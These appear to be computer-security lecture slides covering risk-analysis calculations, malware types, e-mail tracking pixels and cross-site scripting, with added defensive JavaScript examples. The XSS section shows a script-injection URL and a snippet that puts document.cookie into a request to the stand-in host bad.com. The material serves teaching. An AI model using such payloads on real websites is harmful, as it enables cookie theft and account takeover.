Computer Security
Set of slides 7
Dr Alexei Vernitski
Risk analysis
• Quantitative risk analysis
• Qualitative risk analysis
Read more in textbooks, for example,
Pfleeger and Pfleeger, chapter “Administering
Security”
Risk analysis
• Step 1: identify assets
– There are many types of assets (data, hardware,
software, people, supplies, brand name,
infrastructure ...)
• Step 2: Determine vulnerabilities
– The list of security goals may be used to suggest
vulnerabilities: Confidentiality, Integrity,
Availability
Risk analysis
• Step 3: Estimate likelihood of exploitation
– Need to estimate the probability of exploitation of
vulnerability
– Can use data on frequency of attacks on specific
systems
– Often an expert analyst can help with this
• Step 4: Compute the loss in case of an attack
– Some are straightforward (e.g. cost of replacing piece
of standard hardware), some may be very difficult
– If recovery is possible, include also the cost of
recovery
Risk analysis
• Step 5: Select new controls
– For each vulnerability a suitable control is selected
– For example, see the matrix of vulnerabilities and
controls in Pfleeger and Pfleeger
• Step 6: Determine project savings
Example
• The input parameters are as follows:
• Asset and cost if lost:
– Data, cost to reconstruct if lost is £10 M
• Likelihood of loss of data (exploit)
– Probability of it is 5% (from expert knowledge)
• Control and cost: encrypted data store with replicated
off-site data storage using transaction based approach
to guarantee backup of each datum change.
– The cost of the solution is £1 M
• Effectiveness of control:
– Probability that the control is effective is 70%
Example
• The calculation is as follows (annual data):
• Expected loss without control: 0.05 × £10 M = £0.5 M
• Expected loss with control: £0.5 M × 0.3 = £0.15 M (the control fails in 30% of cases)
• Cost of control and expected loss with control in
place:
• £0.15 M + £1.0 M = £1.15 M
• Finally the decision: the cost with the control
(£1.15 M) is larger than the cost without (£0.5 M)
• so decide not to use control
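The calculation above as an added example (not part of the original slides). It also computes the break-even likelihood and repeats the decision for several likelihood estimates, because the 5% figure is only an expert estimate. The function and field names are assumptions made for this illustration.

```javascript
// Quantitative cost/benefit check for one control, following the slides' steps.
// All monetary values are in £ millions per year.
function analyseControl({ lossIfExploited, likelihood, controlCost, effectiveness }) {
  const lossWithout = likelihood * lossIfExploited;        // expected annual loss, no control
  const residualLoss = lossWithout * (1 - effectiveness);  // expected loss the control does not stop
  const costWith = residualLoss + controlCost;             // total annual cost with the control
  return {
    lossWithout,
    costWith,
    adopt: costWith < lossWithout,
    // Likelihood at which both options cost the same: p * L * e = C
    breakEvenLikelihood: controlCost / (lossIfExploited * effectiveness),
  };
}

// Input parameters taken from the slide.
const slideExample = { lossIfExploited: 10, likelihood: 0.05, controlCost: 1, effectiveness: 0.7 };

// Repeat the decision for a range of likelihood estimates to see how robust it is.
function sweepLikelihood(params, estimates) {
  return estimates.map((likelihood) => {
    const r = analyseControl({ ...params, likelihood });
    return { likelihood, adopt: r.adopt };
  });
}

const base = analyseControl(slideExample);
console.log('loss without control:', base.lossWithout.toFixed(2));
console.log('cost with control:   ', base.costWith.toFixed(2));
console.log('adopt control:       ', base.adopt);
console.log('break-even likelihood:', (base.breakEvenLikelihood * 100).toFixed(1) + '%');
console.log(sweepLikelihood(slideExample, [0.05, 0.10, 0.15, 0.20]));
```

The decision flips once the estimated likelihood passes roughly 14%, which shows how sensitive the result is to a figure that came from expert judgement.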
Example – for discussion
• (Pfleeger and Pfleeger, Table 8-7)
• Cost of reconstructing data, if lost: £1 M
• Likelihood of the loss of the data (per year):
10%
• Access control software is available which
costs £25 K and is effective in 60% of cases
• Should we buy this software?
Example – for discussion
• An organisation has 100 employees. Each of them uses a
laptop that costs £1000. In any one year there are likely to
be two employees that lose their laptops and need an
urgent replacement to carry out their work. The
organisation decides to buy one spare laptop (cost £1000
per year). This replacement is likely to be available and
useful in 80% of the cases of a loss (i.e. it may not have
specialist software installed which an employee needs
immediately, or the replacement laptop may be used by
another employee).
• Carry out each of the steps of a quantitative risk analysis.
• Carry out a cost/benefit analysis (if possible) and state if
the organisation should carry out the proposal.
• Most parameters are difficult or impossible to
evaluate:
– amount of loss for a given asset
– some valuable items (e.g. a human life)
– likelihood that a loss will occur
– cost of control
– effectiveness of control
• Why do we need risk analysis, even though
the numbers it produces are unreliable?
Risk analysis
• Quantitative risk analysis
uses costs and probabilities
• Qualitative risk analysis
uses non-numerical grades, for example
– Critical / very important / important / not important
– Very likely / likely / unlikely / very unlikely
• Which type of analysis would you
recommend, the quantitative or the
qualitative one?
Other types of malware
• Viruses
• Worms
• Trojans
• Rootkits
• Trapdoors/backdoors
Trojans
• A trojan horse is a program that appears to
have some useful or benign purpose, but
really masks some hidden malicious
functionality
• Example:
http://www.softlate.com/
Trojans
• Unlike viruses, Trojan horses do not replicate
themselves
• Unlike viruses, which are just bad tricks, Trojan
horses usually attempt to do something useful
for their creator
• The main use of Trojans is to collect
information from your computer
• This is why they are called spyware
Example: W32/Sdbot-MA
• Each time W32/Sdbot-MA is run it attempts to
connect to a remote IRC server and join a specific
channel. The worm then runs in the background
allowing a remote intruder to issue commands
which control the computer.
• W32/Sdbot-MA can be instructed to download and
install programs on the infected computer, to flood
other computers with network packets and retrieve
system information including CD-keys for various
games.
(the information is taken from www.sophos.com)
Trojans’ behaviour
• Simple examples of typical behaviour of a
Trojan include:
• Attempting to send e-mail messages to its
creator
• Opening a TCP/IP port on your computer, to
allow its creator to connect to your computer
How Trojans collect information
• Keystroke trackers (also known as keystroke
recorders) – record what the user has typed
• Fake login screens – they emulate login to find
out your password
How Trojans collect information
• Garbage trackers – they look in the RAM or on
the disk for documents which might be
encrypted when they are stored in files
• 85% of documents edited yesterday can be
found in unused sectors of the hard drive
Protection against Trojans
• Before your computer is infected:
– Do not download software from untrusted
sources
• When your computer is infected:
– Checking logs
– Using sandboxes (what is a sandbox?)
– Using firewalls (what is a firewall?)
Worms
• A worm is a self-replicating piece of code that
spreads via networks and usually doesn’t
require human interaction to propagate.
• Example: Melissa virus from the previous
lecture could be also classified as a worm
Trapdoors/backdoors
• A backdoor is a secret entry point to a
program that otherwise operates normally. It
allows attackers to bypass normal security
controls, gaining access on the attacker’s own
terms.
• (this is the definition given with respect to one
separate program)
Backdoors (relative to one program)
(Diagram labels)
• Here, a password is checked
• And here, the actual code starts
• Normally, execution starts at the beginning of the program
• However, a hacker can start the program at some distance from the beginning, and see what happens
Trapdoors/backdoors
• A backdoor is a program that allows
attackers to bypass normal security controls
on a system, gaining access on the attacker’s
own terms.
• (this is the definition given with respect to the
whole computer system)
Backdoors (relative to a computer)
(Diagram labels)
• First, check the user’s password
• After that, allow the user to work with the data or run programs
• The normal user’s work session starts here
• a hacker can start a work session bypassing password check
Backdoors
• Remote execution of individual commands
• Remote command-line access
• Remote control of the GUI
Rootkit
• A rootkit is a set of tools that modify existing
operating system software so that an attacker
can keep access to and hide on the machine.
• We can say that rootkits install trojans and
backdoors – why?
Code in e-mail messages
• These are simple techniques which an attacker
can use; we consider them to prepare for
considering more complicated techniques of
cross-site scripting
• It is possible to include executable code (e.g.
JavaScript, VBA) in e-mail messages
• This can be used to collect information about the
receiver of the message
• In more dangerous cases, the code can affect the
work of the receiver’s computer
Code in e-mail messages
• Example: spammers check the validity of e-mail
addresses using HTML messages
• (this is referred to as ‘read tracking’, or also
look up ‘pixel tracking’)
• <html>
<body>
<img src="www.spam.com/script.php?id=3495">
</body>
</html>
How spammers check the validity of e-mail
addresses
• The idea is as follows.
• The spammer generates a numbered list of e-mail
addresses, for example:
1 [email protected]
2 [email protected]
…………
3495 [email protected]
• The spammer sends a message to each address,
which includes the number of this address in the list
as an argument of a script
Code in e-mail messages
• <img src="www.spam.com/script.php?id=3495">
• client: The client on which asvern checks his e-mail is lured into asking the server to execute script.php with an argument id=3495
• server: The script script.php is executed on the server www.spam.com. This script can record that asvern checks his e-mail, therefore, it is a valid email address
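The mail client's side of this exchange, as an added example (not part of the original slides): a filter that replaces remote images before a message is displayed, so that opening it sends no request to the sender's server. The function names and the sample message are constructed for illustration; a real client would use an HTML parser rather than regular expressions.

```javascript
// Find remote <img> references in an HTML e-mail body and neutralise them.
const IMG_TAG = /<img\b[^>]*>/gi;
const SRC_ATTR = /\ssrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;

function isRemote(src) {
  // Images embedded in the message itself (cid: or data:) need no network fetch.
  return !/^(cid|data):/i.test(src.trim());
}

function hasIdentifier(src) {
  // A query string lets the sender encode a per-recipient value, as in ?id=3495.
  const q = src.indexOf('?');
  return q !== -1 && q < src.length - 1;
}

function blockRemoteImages(html) {
  const blocked = [];
  const safeHtml = html.replace(IMG_TAG, (tag) => {
    const m = SRC_ATTR.exec(tag);
    if (!m) return tag;                       // no src attribute: nothing to fetch
    const src = m[1] ?? m[2] ?? m[3];
    if (!isRemote(src)) return tag;           // embedded image: keep as is
    blocked.push({ src, perRecipient: hasIdentifier(src) });
    return '<img alt="[remote image blocked]">';
  });
  return { safeHtml, blocked };
}

// Constructed sample message: the slide's tracking image plus an embedded logo.
const sampleMessage = [
  '<html><body>',
  '<img src="http://www.spam.com/script.php?id=3495">',
  '<img src="cid:logo@example.invalid">',
  '</body></html>',
].join('\n');

const result = blockRemoteImages(sampleMessage);
console.log(result.blocked);
console.log(result.safeHtml);
```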
For discussion
• Before December 2013 Google Mail did not
show images in messages by default
• After December 2013, Google caches the
images on its servers before showing them to
the recipient
• What are the advantages and disadvantages
of this change?
• Discussed, for example, here:
https://threatpost.com/gmail-image-proxy-changes-have-privacy-security-implications/103192
Cross-site scripting (XSS)
• XSS comes in two broad forms, which have
these confusing names:
– non-permanent, or, reflective
– permanent
• In both forms the attacker uses some means
to send some code to a web server so that a
victim accesses the page and runs the code
thinking it comes from the “trusted” webserver rather than the attacker.
XSS: snippets of code
• Good examples of insecure pages:
http://www.insecurelabs.org/task
• ‘Hello world’ in Javascript:
<script>alert('hello world')</script>
• A query passed to the server and executed by the
client:
http://www.insecurelabs.org/task/Rule1?query=<script>alert('hello world')</script>
• Instead of this simple script, a code stealing
cookies would be used by an attacker
XSS: a simplified example
• Suppose the attacker places the following
comment on a message board:
<SCRIPT type="text/javascript">
c = 'bad.com/process.php?cookie=' +
escape(document.cookie);
</SCRIPT>
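Both forms of XSS come down to user-supplied text being written into a page as markup. The added example below (not part of the original slides) shows a vulnerable page beside a version that encodes its output, for the non-permanent and the permanent case. The function names are assumptions, and the inputs are constructed from the harmless alert() snippet above.

```javascript
// Encode the characters that let text be parsed as HTML markup or break out of an attribute.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Non-permanent (reflective) case: the value comes straight from the request URL.
function searchPageUnsafe(requestUrl) {
  const query = new URL(requestUrl).searchParams.get('query') ?? '';
  return '<p>Results for ' + query + '</p>';              // markup from the URL reaches the page
}
function searchPageSafe(requestUrl) {
  const query = new URL(requestUrl).searchParams.get('query') ?? '';
  return '<p>Results for ' + escapeHtml(query) + '</p>';  // shown as text, never parsed as a tag
}

// Permanent case: the value was stored earlier and is served to every later visitor.
function boardPageSafe(storedComments) {
  // Comments are kept as submitted and encoded at output time.
  return '<ul>' + storedComments.map((c) => '<li>' + escapeHtml(c) + '</li>').join('') + '</ul>';
}

// Constructed inputs.
const payload = "<script>alert('hello world')</script>";
const reflectedUrl = 'http://www.insecurelabs.org/task/Rule1?query=' + encodeURIComponent(payload);
const storedComments = ['Nice post!', payload];

console.log(searchPageUnsafe(reflectedUrl));
console.log(searchPageSafe(reflectedUrl));
console.log(boardPageSafe(storedComments));
```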
Sample exam questions
• Comment on the news item:
“Deniss Calovskis was named by the US as one of
the creators of the Gozi virus.
Security analyst Graham Cluley said Gozi was a
very successful trojan that pilfered huge sums
from bank accounts.”
• Comment on the news item:
“The suspected hackers allegedly placed back
doors, or code, to allow them to get back into
the systems later to steal confidential
information.”
Sample exam questions
• Explain exactly what the word ‘cross-site’
stands for in cross-site scripting (XSS).
• Experts in computer security distinguish
between permanent and non-permanent
cross-site scripting. Explain exactly what the
difference is between permanent and non-permanent cross-site scripting.